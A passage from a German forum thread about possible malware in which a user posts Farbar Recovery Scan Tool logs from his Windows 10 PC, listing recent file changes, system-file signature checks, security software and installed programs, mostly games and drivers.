2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-07 16:46 - 2017-03-20 07:06 - 00000000 ___HD C:\$WINDOWS.~BT
2017-05-01 12:46 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
2017-05-19 14:19 - 2014-01-23 08:04 - 0178760 _____ (Microsoft Corporation) C:\Users\Dino\AppData\Local\Temp\ose00000.exe
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group                                               ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-07 17:13

==================== Ende von FRST.txt ============================
         

Alt 19.05.2017, 15:31   #2
dinoexe
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 14-05-2017
durchgeführt von Dino (19-05-2017 14:42:22)
Gestartet von D:\Dino\Downloads
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Spybot - Search and Destroy (Disabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version:  - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version:  - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version:  - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version:  - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 de)) (Version: 53.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version:  - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version:  - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version:  - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
